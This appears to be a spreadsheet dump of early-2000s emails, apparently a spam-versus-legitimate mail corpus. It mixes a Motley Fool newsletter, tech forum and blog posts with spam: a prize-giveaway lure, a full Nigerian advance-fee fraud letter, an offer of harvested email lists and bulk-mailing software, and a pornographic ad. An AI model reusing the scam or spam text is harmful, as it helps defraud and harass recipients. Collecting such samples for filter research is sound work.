 http://www.fool.com/m.asp?i=562077
 -----------------------------------------------------------------
 SPOTLIGHT
 SHOULD ALL MY SAVINGS BE IN THE MARKET?
 Um, no. 
 We are big supporters of the idea that all of your long-term 
 money should be in the stock market. But over the short term, 
 the market is too volatile. Buying stocks for short-term gain is 
 really speculating, not investing. Would you have wanted to have 
 your emergency fund, or your house down payment, or your kid's 
 tuition in the Nasdaq at its height on March 10, 2000? If you 
 can't afford or wait out a 30% drop in the value of your 
 savings, keep it out of the market.
 Of course, we're not just going to leave you hanging. To figure 
 out the best place to keep your short-term savings, visit our 
 nifty Savings Center. 
 http://www.fool.com/m.asp?i=562078
 -----------------------------------------------------------------
 COMMUNITY TIPS
 DO (AT LEAST) ONE THING DIFFERENTLY
 Folks on the Living Below Your Means discussion board have been 
 sharing at least one thing they are going to do differently in 
 2002 to save money. 
 -I am going to make sure I carry my coupon envelope in my purse 
  so I don't find myself at the grocery store buying a bunch of 
  stuff on which I could save a bunch of money if I hadn't left my 
  coupons at home. 
 -Make sure I get reimbursed for every dime my company owes me. I 
  have a bad habit of not filing expense reports for little stuff, 
  like 10 miles of mileage to go to a mediation. Ten miles is 
  $3.10 and if I do that 10 times a year, that's more than 30 
  bucks, and definitely worth filing an expense report for. 
 -I'm going to make at least one crock-pot meal a week so I don't 
  get tempted to go out and buy something to eat. Fridays would be 
  a great time to do this. 
 -Either cut down on the long-distance phone calls, or else find 
  a cheaper long-distance plan.
 -Document everything that I give to charity, including the 
  clothes and books, so that I can deduct it from my taxes. 
 -Keep turning down the thermostat at night and when I leave the 
  house. Run my humidifier (moist air is cheaper to heat). 
 Have any tips of your own? Add to the growing list here.
 http://www.fool.com/m.asp?i=562079
 =================================================================
 SPONSORED BY: Datek
 Datek Online. Built to trade.
 *Proprietary auto routing technology | *$9.99 commission 
 for online equity trades | *60-second execution commitment.
 Apply for a Datek Account Now!
 http://www.lnksrv.com/m.asp?i=562080
 =================================================================
 My Portfolio: http://www.fool.com/m.asp?i=562081
 My Discussion Boards: http://www.fool.com/m.asp?i=562082
 WANNA TAKE THE SHORTCUT?
 Check out our new Crash Courses, the fastest way to get
 your finances in order. Get results in less than an hour, for
 just $10. Try one today!
 http://www.fool.com/m.asp?i=562083
 PERKS FOR FOOLS ONLY
 Get free stuff and special offers, just for you!
 http://www.fool.com/m.asp?i=562084
 CUSTOMER SERVICE
 Ask our staff for help with email delivery problems.
 http://www.fool.com/m.asp?i=562085
 UNSUBSCRIBE
 Here's how to unsubscribe or change your settings.
 http://www.fool.com/community/freemail/freemaillogin.asp?email=mkettler@home.com
 _____________________________________________________
 Copyright (c) 1995-2001 The Motley Fool. All rights reserved.
 Legal Information: http://www.fool.com/m.asp?i=562086
 MsgId: msg-7678-2002-01-02_13-22-47-4816731_25_Plain_MessageAddress.msg-13:51:39(1-02-2002)
 X-Version: mailer-sender-master,v 1.84 
 X-Version: mailer-sender-daemon,v 1.84 
 Message-Recipient: mkettler@home.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 You have been specially selected to qualify for the following:
 Premium Vacation Package and Pentium PC Giveaway
 To review the details of the please click on the link 
 with the confirmation number below:
 http://www.1chn.net/wintrip
 Confirmation Number#Lh340
 Please confirm your entry within 24 hours of receipt of this confirmation.
 Wishing you a fun filled vacation!
 If you should have any additional questions or cann't connect to the site 
 do not hesitate to contact me direct:
 mailto:vacation@btamail.net.cn?subject=Help!
</t>
  </si>
  <si>
    <t xml:space="preserve">GLM wrote:
 &gt;And a Java program, due to the extensive class libraries, will weigh
 &gt;in at 10% the number of lines of the equivalent C program.  QED.
 Quod erat not demonstrandum at all.
 There are massive amounts of libraries for C, Fortran and so on.
 To pick an obvious example., if you want to do linear algebra, then
 Java isn't a serious candidate at all.
 Furthermore, plenty of bugs occur in the libraries too, at a lower
 rate due to more users having been bitten by them, but they are much
 harder for you to fix than in your own code.
 Why do so many people outside of Sun's marketing department consider
 Java to be "Write Once, Debug Everywhere" ?
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Urgent Contact
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM THE DESK OF: Dr tom eke.
 E-Mail:dr_tomeke@spinfinder.com
 LAGOS - NIGERIA. 
 ATTN:  
 REQUEST FOR URGENT BUSINESS RELATIONSHIP. 
 It is with my profound dignity that I write you this
 very important
 and highly confidential letter. First, I must
 solicit your strictest
 confidentiality in this transaction. This is by
 virtue of its nature
 as being utterly CONFIDENTIAL and "TOP SECRET".
 Though I know that a
 transaction of this magnitude will make any one
 apprehensive and
 worried,considering the fact that we have not met
 each other before,
 but I am assuring you that all will be well at the
 end of the day. We
 have decided to contact you by email due to the
 urgency of this
 transaction, as we have been reliably informed that
 it will take at
 least a minimum of two to three weeks for a normal
 post to reach you,
 so we decided it is best using the e-mail,which is
 quicker and also
 to enable us meet up with the second quater payment
 for the year
 2000. 
 However, let me start by introducing myself properly
 to you. I
 am Dr.tom eke, a Director General in the Department
 Of Petroleum 
 Resources(D.P.R) and I presently head The Contract
 Award Panel incharge
 of Contract Awards and Payment Approvals. I came to
 know of you in my search for a reliable and
 reputable person to
 handle a very confidential business transaction
 which involves the
 transfer of a huge sum of money to a foreign account
 requiring
 maximum CONFIDENCE. I and my colleagues are Top
 Officials of the
 Federal Government Contract Award Panel. Our duties
 include Evaluation, Vetting, Approval for payment of
 Contract jobs
 done for the D.P.R e.t.c. In order to commence this
 business we
 solicit for your assistance to enable us transfer
 into your Account
 the said funds. The source of this funds is as
 follows: In the second
 quarter of 2001 this committee was mandated to
 review and award
 contracts to the tune of US$400 million US dollars
 to a group of five
 firms for the supply construction and installation
 of Oil Pipe lines
 in Warri and Port Harcourt. During this process my
 colleagues and I
 decided and agreed among ourselves to deliberately
 over-inflate the
 total contract sum from US$400 million to US$431
 million United
 States dollars with the main intention of sharing
 the remaining sum
 of US$31 miilion amongst ourselves. 
 The Federal Government of Nigeria has since the
 second quater of	
 year 2001 approved the sum of US$431 million for us
 as the contract sum, 
 and the sum of US$400 million has also been paid to
 the foreign companies 
 concerned as contract entitlements for the various
 contracts done, but 
 since the companies are entiltled to US$400 million
 dollars only, we are 
 now left with US$31 million dollars balance in the
 account which we intend to
 disburse amongst ourselves, but by virtue of our
 positions as civil
 servants and members of this panel, we cannot do
 this by ourselves,
 as we are prohibited by the Code of Conduct Bureau
 (Civil Service
 Laws) from opening and/or operating foreign accounts
 in our names
 while still in Government service, making it
 impossible for us to
 acquire the money in our names right now. I have
 therefore, been
 delegated as a matter of trust and urgency by my
 colleagues in the
 panel to look for an overseas partner into whose
 account we would
 transfer the sum of US$31 million. Hence we are
 writing you this
 letter. My Colleagues and I have agreed that if you
 or your company
 can act as the beneficiary of this funds on our
 behalf, you or your
 Company will retain 20% of the total amount (US$31
 million), while
 70% will be for us(OFFICIALS) and the remaining 10%
 will be used in
 offsetting all debts/expenses and Taxes incurred
 both local and
 foreign in the cause of this transfer. Needless to
 say, the trust
 reposed on you at this juncture is enormous. In
 return we demand your
 complete honesty and trust. 
 You must however NOTE that this transaction will be
 strictly based 
 on the following terms and conditions as we have
 stated below; 
 a) Our conviction of your transparent honesty and
 diligence 
 b) That you would treat this transaction with utmost
 secrecy and confidentiality 
 c) That you will not ask for more share or try to
 sit on the funds once it is under
 your custody, or any form of blackmail. 
 d) That upon receipt of the funds you will release
 the funds as instructed 
 by us after you have removed your share of 20% from
 the total amount. 
 Please, note that this transaction is 100% legal and
 risk free and we hope to conclude
 this transaction seven to fourteen bank working days
 from the date 
 of receipt of the necessary requirements from you .
 We are looking 
 forward to doing business with you and solicit your
 Total Confidentiality
 in this transaction. There is no cause for alarm. I
 give you my word that you
 are completely safe in doing business with us.
 Transactions like this
 have been successfully carried out in the past by
 most Government
 executives. Here in my country there is great
 economic and political
 disarray and thus looting and corruption is rampant
 and the order of
 the day, thus explaining why you might have heard
 stories of how
 money is been taken out of Nigeria, this is because
 everyone is
 making desperate attempts to secure his or her
 future, so that when
 we retire from active service we donot languish in
 poverty. I will
 explain more to you when I have heard from you. 
 Please acknowledge the receipt of this letter using
 the above e-mail address. 
 I will bring you into the complete picture of this
 pending business
 transaction when I have heard from you and also
 receive your
 confidential telephone and fax numbers to enable me
 fax to you all
 necessary information you need to know about our
 pending business
 transaction. I will also send to you my private
 telephone and fax
 numbers where you can always reach me. Your urgent
 response will be
 highly appreciated to enable us transfer the funds
 under the second
 quarter of the year 2002. Thank you and God Bless. 
 Yours faithfully, 
 Dr.tom eke. 
 N.B. PLEASE BE INFORMED THAT THIS BUSINESS
 TRANSACTION IS 100% LEGAL
 AND COMPLETELY FREE FROM DRUG MONEY OR MONEY
 LAUNDERING. THIS IS A
 COMPLETE LEGITIMATE BUSINESS TRANSACTION. 
 -- 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Google News
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.oblomovka.com/entries/2002/09/24#1032870720
 Date: 2002-09-24T05:32:00-0700
 There are a few net innovations that have far greater ramifications than you 
 would, at first hearing, expect them to. Napster, at heart just IRC with a UI, 
 was one. Google News[1] is another. 
 In its first day, I've already noticed: 
 - The front page changes its editorial stance depending on where the earth's 
 terminator[2] is. So in the evening on the West Coast, Google News is lead by 
 the South China Morning Post, and various Asian english-language papers. By the 
 late evening, the BBC and European papers are kicking in. 
 - The site may be created by algorithms - but what about the choice of sites? 
 The most arbitrary dividing line I see in Google's coverage is what is a news 
 site, and what isn't. Slashdot[3] is, for instance, as well as some very 
 obscure[4] newspapers. What about Blues News[5] or Scripting News[6], though? 
 - Big companies spend mucho money paying "clipping services" that send them 
 copies of any press coverage they receive. Clipping services are going to have 
 to find some added value, very[7] very[8] quickly. 
 [1] http://news.google.com/
 [2] http://www.concentric.net/~marsface/glossary.htm#sectT
     The
 sunrise-sunset line dividing the day and night halves of the Moon or a
 planet.
 [3] http://www.slashdot.org/
 [4] http://www.eveningnews24.co.uk/
 [5] http://www.bluesnews.com/
 [6] http://www.scripting.com/
 [7] http://news.google.com/news?hl=en&amp;q=%22Danny+O%27Brien%22&amp;btnG=Google+Search
 [8] http://news.google.com/news?hl=en&amp;q=www.ntk.net&amp;btnG=Google+Search
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Play a Hilarious Phone Prank
</t>
  </si>
  <si>
    <t xml:space="preserve">Wind up your mates today! Please visit http://ukprankcalls.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Rambus, Man
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --------------090602010909000705010009
 Content-Type: text/plain; charset=ISO-8859-1; format=flowed
 Content-Transfer-Encoding: 8bit
 Geege wrote:
 &gt;This message was sent to you from http://www.idg.net
 &gt;
 &gt;Geege would like you to read the story below:
 &gt;
 &gt;http://www.idg.net/gomail.cgi?id=940026
 &gt;
 &gt;Title:
 &gt;A first look at the 2.8-GHz Pentium 4
 &gt;
 &gt;Summary:
 &gt;Latest Rambus memory plus fast bus appear to give Intel's newest P4 the jolt it needs.
 &gt;
 &gt;Geege attached the following message:
 &gt;------------------------------------------------------------
 &gt;ha ha ha harley.  rambus earns it.
 &gt;------------------------------------------------------------
 &gt;
 &gt;Stay on top of the world of Information Technology with your own
 &gt;FREE subscription to our specialized newsletters. Subscribe now
 &gt;at http://www.idg.net/subscribe
 &gt;
 &gt;
 &gt;7132
 &gt;
 &gt;  
 &gt;
 The overclockers have given it another jolt, perhaps to potential sales 
 (and maybe sales of liquid nitrogen):
 via slashdot
 Owen
 http://www.muropaketti.com/artikkelit/cpu/nw2800/index3.phtml
 *Pivmr:* 26.8.2002
 *Artikkeli:* Intel Northwood 2,8GHz
 *Tekij:* Sampsa Kurri &lt;mailto:sampsa.kurri@muropaketti.com&gt;
 *English Summary*
 When the Intel Pentium 4 2,8GHz CPU arrived to our testlab we ordered 10 
 liters of Liquid Nitrogen (LN2 -196C) and decided to run some tests in 
 very low temperatures.
 After some adjusting and testing we were able to run SiSoft Sandra CPU 
 and Memory benchmarks and Pifast benchmark smoothly when the CPU was 
 running at 3917MHz. We raised the FSB one more step and managed to run 
 succesfully SuperPi benchmark while CPU was running at 3998MHz. The 
 result was 39 seconds.
 Test setup: P4 2,8GHz, Modified Asus P4T533-C, Samsung PC800 RDRAM, PNY 
 GeForce 4 MX440 and Windows XP OS.
 Check out the pictures.
 --------------090602010909000705010009--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Y! Finance RSS Feeds Off
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000197.html
 Date: 2002-09-26T21:06:10-08:00
 As many of you have noticed, the feeds are off now. Will they be back on? I 
 hope so. Soon? I'm not sure. What I will (and can) say is that the experience 
 was very valuable for us....
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Grow Your Business
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Dear friend&lt;/title&gt;
 &lt;style type="text/css"&gt; 
 &lt;!-- 
 a { color: #339966; text-decoration: none} 
 a:hover { color: #FF3300; text-decoration: underline} 
 --&gt; 
 &lt;/style&gt; 
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="-1"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font face="Arial" size="2"&gt;You are receiving this email because
 you         
 registered to receive special offers from one of our marketing
 partners.&amp;nbsp;&lt;br&gt;        
 If you would prefer not to receive future emails, &lt;font
 color="#000000"&gt;please click         
 here to unsubscribe: &lt;/font&gt;&lt;font color="#0000FF"&gt;&lt;a
 href="mailto:EmailMarketing@eyou.com"&gt;EmailMarketing@eyou.com&lt;/a&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;/p&gt;                           
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;br&gt;   
 Now there are billions of email users in the world,and                    
 this amount is increasing greatly&amp;nbsp;every&amp;nbsp;&lt;br&gt;                     
 year .&amp;nbsp; People are now sending informations and conducting the&amp;nbsp; 
 internet marketing&amp;nbsp; through&lt;br&gt;                      
 email , because of its cheap cost and fast connection .&amp;nbsp; If you want
 to                       
 introduce and&amp;nbsp;sell your&lt;br&gt;                      
 product or service ,&amp;nbsp; it would be the best way&amp;nbsp; for you&amp;nbsp; to
 use                       
 the&amp;nbsp; email to&amp;nbsp; contact &amp;nbsp;with&amp;nbsp; your&amp;nbsp;&lt;br&gt;          
 targeted&amp;nbsp; customers&amp;nbsp; ( of&amp;nbsp; course&amp;nbsp;you
 should&amp;nbsp;be&amp;nbsp;aware&amp;nbsp;of&amp;nbsp;                       
 the&amp;nbsp;
 email&amp;nbsp;address&amp;nbsp;of&amp;nbsp;the&amp;nbsp;targeted&amp;nbsp;&amp;nbsp;&lt;br&gt;         
 customers&amp;nbsp; firstly&amp;nbsp; )&amp;nbsp; . Targeted&amp;nbsp; email&amp;nbsp; is no
 doubt                       
 very effective .&amp;nbsp; If&amp;nbsp; you&amp;nbsp;could introduce your&amp;nbsp;&lt;br&gt;   
 product&amp;nbsp;or&amp;nbsp; service &amp;nbsp;through&amp;nbsp; email&amp;nbsp;
 directly&amp;nbsp; to&amp;nbsp;                       
 the&amp;nbsp; customer&amp;nbsp; who&amp;nbsp; are interested in them
 ,&amp;nbsp;it&amp;nbsp;&lt;br&gt;                      
 will bring to you much&amp;nbsp; more business&amp;nbsp;chance and success.&lt;br&gt;   
 &lt;br&gt;                      
 XinLan Internet Marketing Center , have many years of experience in
 developing&amp;nbsp;         
 &lt;font size="1"&gt;&amp;amp;&amp;nbsp;&lt;/font&gt; utilizing&amp;nbsp;&lt;br&gt;                     
 internet resources.We have set up global business email address databases,
 which&amp;nbsp;                       
 contain&lt;br&gt;                      
 millions&amp;nbsp; of&amp;nbsp;&amp;nbsp; email&amp;nbsp; addresses of&amp;nbsp;
 commercial&amp;nbsp;                       
 enterprises and&amp;nbsp; consumers&amp;nbsp;all over the world.&amp;nbsp;&lt;br&gt;        
 These email addresses are sorted by countries and fields.&amp;nbsp;By
 using&amp;nbsp; advanced&amp;nbsp;                     
 professional&lt;br&gt;                     
 technology, we also continuously update our databases,add
 new&amp;nbsp;addresses ,&amp;nbsp;                       
 remove undel-&lt;br&gt;                      
 iverables and unsubscribe&amp;nbsp;addresses.With  the cooperation with our
 partners,                  
 We are able to&lt;br&gt;                  
 supply&amp;nbsp; valid targeted email&amp;nbsp; addresses&amp;nbsp; according&amp;nbsp;
 to&amp;nbsp;                  
 your&amp;nbsp; requirements ( for example,&amp;nbsp; you&amp;nbsp;&lt;br&gt;                 
  need&amp;nbsp;some email                       
 addresses of Importers in the field of auto spare part in England ).
 With&amp;nbsp;our&amp;nbsp;&lt;br&gt;                 
 supplied email addresses&lt;/font&gt;,&lt;font face="Arial"&gt;you                    
 can easily and directly contact your potential customers.&lt;br&gt;             
 &lt;br&gt;                                            
 We also supply&amp;nbsp; a&amp;nbsp; wide variety&amp;nbsp; of software.&amp;nbsp;&lt;br&gt;    
 For example ,&amp;nbsp;Wcast,&amp;nbsp; the software for&amp;nbsp; fast-sending
 emails:&amp;nbsp;         
 this software                                            
 will enable&amp;nbsp;you to&amp;nbsp;&lt;br&gt;                                           
  send&amp;nbsp; emails&amp;nbsp; at&amp;nbsp; the rate of&amp;nbsp; over 10,000&amp;nbsp;
 pcs&amp;nbsp;                             
 per hour,&amp;nbsp;and to release&amp;nbsp; information&amp;nbsp; to&amp;nbsp;&lt;br&gt;        
  thousands of people in a short&amp;nbsp; time.&lt;br&gt;                           
 &lt;br&gt;                                            
 We are pleased to tell you that we are now offering our best prices
 :&lt;/font&gt;&lt;/p&gt;                      
 &lt;div align="left"&gt;                                          
   &lt;table border="1" width="628" height="103"&gt;                             
     &lt;tr&gt;                                          
       &lt;td width="204" height="17"&gt;&lt;b&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;           
         Emails&amp;nbsp; or&amp;nbsp; Software&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                    
       &lt;td width="336" height="17"&gt;&lt;b&gt;&lt;font face="Arial"
 size="2"&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                          
         &amp;nbsp;&amp;nbsp; Remark&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                               
       &lt;td width="66" height="17"&gt;&lt;b&gt;&lt;font face="Arial" size="2"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;                                        
         Price&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;                                           
     &lt;/tr&gt;                                           
     &lt;tr&gt;                                           
       &lt;td width="204" height="94"&gt;&lt;font size="2" face="Arial"&gt;&amp;nbsp;50,000
 targeted                                  
         email addresses&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                 
       &lt;td width="336" height="94"&gt;&lt;br&gt;                                      
         &lt;font size="2" face="Arial"&gt;We are able&amp;nbsp;to&amp;nbsp;supply&amp;nbsp; 
         valid&amp;nbsp; targeted&amp;nbsp; email&amp;nbsp;addresses according to your 
         requirements , which&amp;nbsp;are all compiled&amp;nbsp; upon
 your&amp;nbsp;order,such&amp;nbsp;as                                
         region / country / occupation&amp;nbsp;/ field&amp;nbsp;/ Domain Name
 (like                             
         AOL.com or MSN.com) etc.&lt;br&gt;                                   
         &lt;br&gt;                                   
         &lt;/font&gt;&lt;/td&gt;                                         
       &lt;td width="66" height="115"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;            
         USD 30.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                            
     &lt;tr&gt;                                   
       &lt;td width="204" height="15"&gt;&lt;font face="Arial" size="2"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;    
         Classified email addresses&lt;/font&gt;&lt;/td&gt;                            
       &lt;td width="336" height="15"&gt;&lt;font face="Arial" size="2"
 color="#000000"&gt;&lt;br&gt;                                 
         Our database contains more than 1600 sort of email addresses,and
 can    
         meet with your different demands.&lt;br&gt;  
 		Such as: Business email addresses in Japan.&lt;br&gt;                         
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
       &lt;td width="66" height="19"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                  
     &lt;/tr&gt;                                
     &lt;tr&gt;                                         
       &lt;td width="204" height="6"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 8 millions                                  
         email addresses&lt;/font&gt;&lt;/td&gt;                                       
       &lt;td width="336" height="6"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;         
         8 millions global commercial enterprises email addresses&lt;br&gt;      
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                            
       &lt;td width="66" height="6"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;USD                                             
         240.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                           
     &lt;/tr&gt;                                           
     &lt;tr&gt;                                           
       &lt;td width="204" height="4"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;          
         Wcast software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                  
       &lt;td width="336" height="4"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;         
         Software for fast-sending emails&amp;nbsp;&lt;br&gt;                        
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                           
       &lt;td width="66" height="4"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;            
         USD 39.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                           
     &lt;tr&gt;                                           
       &lt;td width="204" height="47"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                         
         Email searcher software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                         
       &lt;td width="336" height="47"&gt;&lt;font size="2" face="Arial"&gt;            
         Software for searching targeted email addresses&lt;br&gt;               
         &lt;/font&gt;&lt;/td&gt;                                             
       &lt;td width="66" height="47"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;            
         USD 68.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                           
     &lt;tr&gt;                              
       &lt;td width="204" height="11"&gt;&lt;font face="Arial" size="3"
 color="#000000"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;             
         &lt;/b&gt;&lt;/font&gt;&lt;font face="Arial" size="2" color="#000000"&gt;Global
 Trade                               
         Poster&lt;/font&gt;&lt;/td&gt;                                           
       &lt;td width="336" height="11"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;        
         Spreading information about your business or products over 3000
 trade              
         message boards and newgroups.&lt;/font&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;             
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                         
       &lt;td width="66" height="11"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;USD          
         135.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                        
     &lt;/tr&gt;                           
     &lt;tr&gt;                                        
       &lt;td width="204" height="10"&gt;&lt;font size="2"
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;                         
         Jet-Hits Plus 2000 Pro&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                          
       &lt;td width="336" height="10"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;        
         Software for submitting website to 8000+&amp;nbsp; search
 engines&amp;nbsp;&lt;br&gt;                                            
         &amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                            
       &lt;td width="66" height="10"&gt;&lt;font face="Arial" size="1"
 color="#000000"&gt;&amp;nbsp;            
         USD 79.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;                                       
     &lt;/tr&gt;                                           
   &lt;/table&gt;                                           
 &lt;/div&gt;                                           
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;br&gt;                                           
 You can order the emails or&amp;nbsp; softwares&amp;nbsp; directly&amp;nbsp; from our 
 website.&amp;nbsp;&lt;font size="3" color="#000000"&gt;For more details,
 please&amp;nbsp;&lt;br&gt;         
  refer to our website&lt;/font&gt;&lt;font size="3"&gt;.&lt;/font&gt;&lt;font size="3"
 color="#000000"&gt;&lt;br&gt;                                      
 &lt;br&gt;                                      
 It is our honour if you are interested in our services or softwares.&amp;nbsp;
 &lt;/font&gt;Please do not hesitate to&lt;br&gt;                       
 contact us if any queries or concerns.&amp;nbsp;It is always our pleasure
 to&amp;nbsp;serve you.&lt;br&gt;                                             
 &lt;br&gt;                                             
 &lt;br&gt;                                             
 Thanks and best regards !&lt;br&gt;                                             
 &lt;br&gt;                                             
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;font face="Arial" size="3"&gt;K.
 Peng&lt;br&gt;           
 Marketing Manager&lt;br&gt;           
 &lt;font color="#0000FF"&gt;&lt;a
 href="mailto:Emailcentre@163.com"&gt;Emailcentre@163.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;font face="Arial" size="3"&gt;        
 &lt;font color="#0000FF"&gt;&lt;a href="http://emailcenter.51road.com"&gt;&lt;br&gt; 
 Http://Emailcenter.51road.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;    
 XinLan Internet Marketing Center&lt;/font&gt;&lt;/p&gt;                               
 &lt;/body&gt;                                        
 &lt;/html&gt;                                        
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fight Piracy -- Regulate Potty Chairs!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85516395
 Date: Not supplied
 &gt;&gt;From Ed Felten's "Freedom to Tinker" site, regarding the TinkleToonz Musical 
 Potty.: 
     This handy toilet training aid offers a "magical, musical land of potty 
     training," by playing a tune whenever liquid is deposited in it. Since it 
     plays digital audio, it qualifies for regulation as a "digital media 
     device" under the Hollings CBDTPA. If the CBDTPA passes, any newly 
     manufactured TinkleToonz Musical Potties will have to incorporate 
     government-approved copy protection technology.  
 Link[1] Discuss[2]
 [1] http://www.freedom-to-tinker.com/archives/cat_fritzs_hit_list.html
 [2] http://www.quicktopic.com/16/H/CnsZyygHAwp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pics for you
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD align=center valign=middle BGCOLOR=#0A0A5A&gt;&lt;center&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;font color=#FFFF00 size=5 face="Geneva, Arial, Helvetica, san-serif"&gt;&lt;strong&gt;GET FREE ACCESS TO XXX PORN!&lt;/strong&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;&lt;table width=100 border=3 cellspacing=0 cellpadding=0&gt;&lt;tr&gt;&lt;td&gt;&lt;TABLE WIDTH=550 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD COLSPAN=3&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_01.jpg WIDTH=550 HEIGHT=112 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_02.gif WIDTH=104 HEIGHT=231 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;TD&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_03.jpg WIDTH=339 HEIGHT=231 